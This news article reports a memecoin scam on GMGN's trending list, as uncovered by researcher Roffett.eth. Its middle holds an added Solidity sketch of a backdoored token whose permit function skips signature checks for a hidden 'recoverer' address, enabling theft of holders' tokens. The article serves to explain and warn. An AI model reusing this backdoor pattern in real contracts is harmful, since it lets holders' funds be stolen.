Scammers are using “trending” lists on memecoin analytics site GMGN to lure in unsuspecting victims and steal their cryptocurrency, according to a September 25 post on X from security researcher Roffett.eth.

The attackers created coins that allowed the developer to transfer any user’s Token to their account. They then transferred the Token between multiple accounts, artificially inflating the trading volume and placing it on GMGN’s “trending” list.

Once the coin appears on the trending list, unsuspecting users buy it, thinking it is a popular coin. But within minutes, their tokens are taken from their wallets, never to be seen again. The developer then reloads the coin into the liquidity pool and resells it to another victim.

Roffett lists Robotaxi, DFC, and Billy’s Dog (NICK) as three examples of malicious coins found on the trending list.

GMGN is an analytics app aimed at memecoin traders on Base, Solana, Tron, Blast, and Ethereum. Its interface consists of several tabs, including “new pair,” “trending,” and “discover,” each of which lists coins based on different criteria.


Roffett said he discovered the scam technique when friends bought coins from the list and found them mysteriously disappearing. One friend thought his wallet had been hacked, but when he created a new wallet and bought the coins again, they were drained.

Intrigued by the mystery, Roffett investigated the attacks using a block explorer and found that they looked like routine phishing attacks. The attacker had called the token’s “permit” function and appeared to supply the user’s signature, which should only have been possible if the user had been tricked into signing on a phishing site. However, the friend denied interacting with any suspicious sites before either attack.

One of the stolen coins was NICK. Roffett investigated NICK’s contract code and found it to be “a little strange.” Instead of containing the common code found in most other token contracts, it had “some very strange and secret methods.”

As evidence of these strange methods, Roffett posted an image of NICK’s “performance” and “novel” functions, which contained obscure text fragments with no apparent purpose.


Roffett eventually discovered that the contract had malicious code hidden inside one of its libraries that allowed the “recoverer” (developer) to call the “permit” function without providing the Token owner’s signature. Roffett stated:

“If the caller address is equal to the recoverer, then by manually creating a specific signature, one can obtain the permissions of any Token owner and then transfer the Token.”

However, the address of the recoverer is also obscured. It is stored as a non-zero 256-bit unsigned integer rather than as an address literal. Just below this number is a function that the contract uses to derive an address from it. Roffett used this function to determine that the malicious “recoverer” is a contract with an address ending in f261.
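To make the mechanism concrete, the sketch below is an added illustration written for this article, not NICK’s actual source or any code posted by Roffett. It reconstructs the pattern he describes: a `permit` function whose signature check lives in a library and is skipped when the caller equals a privileged “recoverer” address, with that address stored as a raw `uint256` constant and cast back to an `address` when needed. The library and contract names, the placeholder constant `0x1111…1111`, and the surrounding ERC-2612 boilerplate are all assumptions; only the branch-on-caller and the integer-to-address derivation correspond to what the article reports.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction of the backdoor pattern described in the article.
// Hypothetical names; the constant below is a placeholder, not a real address.
library PermitLib {
    // Privileged address hidden as a plain integer so it does not read as an
    // address in the source. Casting uint256 -> uint160 -> address recovers it.
    uint256 private constant RECOVERER_RAW =
        0x0000000000000000000000001111111111111111111111111111111111111111;

    function recoverer() internal pure returns (address) {
        return address(uint160(RECOVERER_RAW));
    }

    // Backdoored check: a normal ERC-2612 implementation would always run
    // ecrecover and require the signer to be `owner`. Here the check is skipped
    // whenever the caller is the recoverer, so any (v, r, s) is accepted.
    function verifyBackdoored(bytes32 digest, address owner, uint8 v, bytes32 r, bytes32 s) internal view {
        if (msg.sender == recoverer()) {
            return; // signature never inspected
        }
        address signer = ecrecover(digest, v, r, s);
        require(signer != address(0) && signer == owner, "invalid signature");
    }

    // The honest version for comparison: no caller-dependent branch.
    function verifyStandard(bytes32 digest, address owner, uint8 v, bytes32 r, bytes32 s) internal pure {
        address signer = ecrecover(digest, v, r, s);
        require(signer != address(0) && signer == owner, "invalid signature");
    }
}

contract ExampleToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => uint256) public nonces;
    mapping(address => mapping(address => uint256)) public allowance;

    bytes32 public immutable DOMAIN_SEPARATOR;
    bytes32 private constant PERMIT_TYPEHASH = keccak256(
        "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
    );

    constructor() {
        DOMAIN_SEPARATOR = keccak256(abi.encode(
            keccak256("EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"),
            keccak256("Example"), keccak256("1"), block.chainid, address(this)
        ));
    }

    // Standard ERC-2612 digest construction; nothing unusual here.
    function _digest(address owner, address spender, uint256 value, uint256 deadline)
        private returns (bytes32)
    {
        return keccak256(abi.encodePacked(
            "\x19\x01", DOMAIN_SEPARATOR,
            keccak256(abi.encode(PERMIT_TYPEHASH, owner, spender, value, nonces[owner]++, deadline))
        ));
    }

    // permit() looks ordinary from the outside; the only malicious line is the
    // call into the library, which hides the caller-dependent bypass.
    function permit(address owner, address spender, uint256 value, uint256 deadline,
                    uint8 v, bytes32 r, bytes32 s) external {
        require(block.timestamp <= deadline, "expired");
        PermitLib.verifyBackdoored(_digest(owner, spender, value, deadline), owner, v, r, s);
        allowance[owner][spender] = value;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        require(allowance[from][msg.sender] >= amount, "allowance");
        require(balanceOf[from] >= amount, "balance");
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}
```

Once the recoverer contract calls `permit(victim, recoverer, balance, deadline, 0, 0, 0)`, it holds an allowance over the victim’s tokens and can `transferFrom` them without any interaction from the victim, which matches the drained-wallet behaviour described above. When reviewing a token before buying, the things worth grepping for are exactly those visible here: a signature check that reads `msg.sender`, a `uint256` or `uint160` constant that is cast to `address`, and an `ecrecover` whose result is not unconditionally compared to `owner`.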

Blockchain data shows that this “recoverer” contract has made more than 100 transactions transferring NICK from Token holders to other accounts.

After discovering how the scam worked, Roffett investigated the “trending” list and found at least two other tokens containing similar code: Robotaxi and DFC.


Roffett concluded that scammers have likely been using this technique for a long time. He warned users to stay away from this list, as using it could lead to loss of money. He said:

“The malicious developers first used multiple addresses to simulate transactions and holding, pushing the Token into the trending list. This attracted retail investors to buy, and eventually, the ERC20 Tokens were stolen, completing the scam. The existence of these trending lists is very harmful to new retail investors entering the market. I hope everyone will be aware of this and not be fooled.”

Scam tokens or “honeypots” continue to pose a risk to cryptocurrency users. In April, a scam token developer siphoned $1.62 million from victims by selling them BONKKILLER tokens that holders were then unable to sell. In 2022, blockchain risk management firm Solidus released a report warning that more than 350 scam coins had been created during the year.
